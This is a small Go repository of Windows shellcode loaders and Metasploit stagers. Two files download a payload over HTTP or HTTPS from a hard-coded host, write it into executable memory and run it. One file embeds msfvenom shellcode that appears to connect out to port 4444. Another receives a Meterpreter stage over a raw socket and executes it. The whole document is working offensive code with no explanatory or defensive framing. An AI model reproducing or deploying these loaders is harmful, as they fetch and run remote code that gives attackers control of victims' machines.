├── http └── rev.go ├── launcher └── launcher.go ├── meterp_stage └── stager.go └── https └── rev.go /http/rev.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "github.com/b00stfr3ak/w32" 6 | "io/ioutil" 7 | "log" 8 | "math/rand" 9 | "net/http" 10 | "os" 11 | "syscall" 12 | "time" 13 | "unsafe" 14 | ) 15 | 16 | var ( 17 | uriCheckSumMin = 5 18 | base64Url = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_" 19 | ) 20 | 21 | func randBase(length int, foo []byte) string { 22 | random := rand.New(rand.NewSource(time.Now().UnixNano())) 23 | var outp []byte 24 | for i := 0; i < length; i++ { 25 | outp = append(outp, foo[random.Intn(len(foo))]) 26 | } 27 | return string(outp) 28 | } 29 | 30 | func randTextBase64URL(length int) string { 31 | foo := []byte(base64Url) 32 | return randBase(length, foo) 33 | } 34 | 35 | func getURI(sum, length int) string { 36 | if length < uriCheckSumMin { 37 | log.Fatal("Length must be ", uriCheckSumMin, " bytes or grater") 38 | } 39 | for { 40 | checksum8 := 0 41 | uri := randTextBase64URL(length) 42 | for _, value := range []byte(uri) { 43 | checksum8 += int(value) 44 | } 45 | if checksum8%0x100 == sum { 46 | return "/" + uri 47 | } 48 | } 49 | } 50 | 51 | func main() { 52 | hostAndPort := "http://192.168.9.225:8080" 53 | response, err := http.Get(hostAndPort + getURI(92, 128)) 54 | if err != nil { 55 | log.Fatal(err) 56 | } 57 | defer response.Body.Close() 58 | payload, err := ioutil.ReadAll(response.Body) 59 | if err != nil { 60 | log.Fatal(err) 61 | } 62 | addr, err := win32.VirtualAlloc(uintptr(len(payload))) 63 | if err != nil { 64 | fmt.Println(err) 65 | os.Exit(1) 66 | } 67 | fmt.Println("Payload length ", len(payload)) 68 | b := (*[890000]byte)(unsafe.Pointer(addr)) 69 | for x, value := range payload { 70 | b[x] = value 71 | } 72 | syscall.Syscall(addr, 0, 0, 0, 0) 73 | } 74 | -------------------------------------------------------------------------------- /launcher/launcher.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "unsafe" 7 | 8 | "github.com/b00stfr3ak/w32" 9 | ) 10 | 11 | // ./msfvenom -p windows/exec cmd=calc.exe -f c | tr -d "\"\n" 12 | 13 | var shellcode string = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x09\x90\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3;" 14 | 15 | func main() { 16 | addr, err := win32.VirtualAlloc(uintptr(len(shellcode))) 17 | if err != nil { 18 | fmt.Println(err) 19 | os.Exit(1) 20 | } 21 | b := (*[80000]byte)(unsafe.Pointer(addr)) 22 | for x, value := range []byte(shellcode) { 23 | b[x] = value 24 | } 25 | //syscall.Syscall(addr, 0, 0, 0, 0) 26 | var threadID uint = 0 27 | hand := win32.CreateThread(0, 0, unsafe.Pointer(addr), 28 | 0, 0, &threadID) 29 | println("created thread") 30 | win32.WaitForSingleObject(hand, 0xFFFFFFF) 31 | } 32 | -------------------------------------------------------------------------------- /meterp_stage/stager.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/binary" 5 | "fmt" 6 | "github.com/b00stfr3ak/w32" 7 | "log" 8 | "syscall" 9 | "unsafe" 10 | ) 11 | 12 | func main() { 13 | var d syscall.WSAData 14 | syscall.WSAStartup(uint32(0x202), &d) 15 | fd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0) 16 | addr := syscall.SockaddrInet4{Port: 4444, Addr: [4]byte{192, 168, 9, 144}} 17 | syscall.Connect(fd, &addr) 18 | fmt.Println("Connected to server") 19 | var buf [4]byte 20 | dataBuf := syscall.WSABuf{Len: uint32(4), Buf: &buf[0]} 21 | flags := uint32(0) 22 | qty := uint32(0) 23 | syscall.WSARecv(fd, &dataBuf, 1, &qty, &flags, nil, nil) 24 | scLength := binary.LittleEndian.Uint32(buf[:]) 25 | fmt.Println("shellcode length is ", scLength) 26 | sc := make([]byte, scLength) 27 | var sc2 []byte 28 | dataBuf = syscall.WSABuf{Len: scLength, Buf: &sc[0]} 29 | flags2 := uint32(0) 30 | qty2 := uint32(0) 31 | total := uint32(0) 32 | for total < scLength { 33 | syscall.WSARecv(fd, &dataBuf, 1, &qty2, &flags2, nil, nil) 34 | for i := 0; i < int(qty2); i++ { 35 | sc2 = append(sc2, sc[i]) 36 | } 37 | total += qty2 38 | } 39 | mem, err := win32.VirtualAlloc(uintptr(scLength + 5)) 40 | if err != nil { 41 | log.Fatalf("Can't create buffer %s", err) 42 | } 43 | fmt.Println("Created buffer") 44 | b := (*[800000]byte)(unsafe.Pointer(mem)) 45 | fmt.Println("Created byte array to virtualalloc") 46 | m := (uintptr)(unsafe.Pointer(fd)) 47 | b[0] = 0xBF 48 | b[1] = byte(m) 49 | b[2] = 0x00 50 | b[3] = 0x00 51 | b[4] = 0x00 52 | for x, s := range sc2 { 53 | b[x+5] = s 54 | } 55 | fmt.Println("wrote shellcode to buffer") 56 | //syscall.Syscall(mem, 0, 0, 0, 0) 57 | var threadID uint = 0 58 | hand := win32.CreateThread(0, 0, unsafe.Pointer(mem), 59 | 0, 0, &threadID) 60 | println("created thread") 61 | win32.WaitForSingleObject(hand, 0xFFFFFFF) 62 | } 63 | -------------------------------------------------------------------------------- /https/rev.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/tls" 5 | "fmt" 6 | "github.com/b00stfr3ak/w32" 7 | "io/ioutil" 8 | "log" 9 | "math/rand" 10 | "net/http" 11 | "os" 12 | "syscall" 13 | "time" 14 | "unsafe" 15 | ) 16 | 17 | var ( 18 | uriCheckSumMin = 5 19 | base64Url = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_" 20 | ) 21 | 22 | func randBase(length int, foo []byte) string { 23 | random := rand.New(rand.NewSource(time.Now().UnixNano())) 24 | var outp []byte 25 | for i := 0; i < length; i++ { 26 | outp = append(outp, foo[random.Intn(len(foo))]) 27 | } 28 | return string(outp) 29 | } 30 | 31 | func randTextBase64URL(length int) string { 32 | foo := []byte(base64Url) 33 | return randBase(length, foo) 34 | } 35 | 36 | func getURI(sum, length int) string { 37 | if length < uriCheckSumMin { 38 | log.Fatal("Length must be ", uriCheckSumMin, " bytes or grater") 39 | } 40 | for { 41 | checksum8 := 0 42 | uri := randTextBase64URL(length) 43 | for _, value := range []byte(uri) { 44 | checksum8 += int(value) 45 | } 46 | if checksum8%0x100 == sum { 47 | return "/" + uri 48 | } 49 | } 50 | } 51 | 52 | func main() { 53 | tr := &http.Transport{ 54 | TLSClientConfig: &tls.Config{InsecureSkipVerify: true}} 55 | client := http.Client{Transport: tr} 56 | hostAndPort := "https://192.168.9.225:8443" 57 | response, err := client.Get(hostAndPort + getURI(92, 20)) 58 | if err != nil { 59 | log.Fatal(err) 60 | } 61 | defer response.Body.Close() 62 | payload, err := ioutil.ReadAll(response.Body) 63 | if err != nil { 64 | log.Fatal(err) 65 | } 66 | addr, err := win32.VirtualAlloc(uintptr(len(payload))) 67 | if err != nil { 68 | fmt.Println(err) 69 | os.Exit(1) 70 | } 71 | fmt.Println("Payload length ", len(payload)) 72 | b := (*[890000]byte)(unsafe.Pointer(addr)) 73 | for x, value := range payload { 74 | b[x] = value 75 | } 76 | syscall.Syscall(addr, 0, 0, 0, 0) 77 | } 78 | --------------------------------------------------------------------------------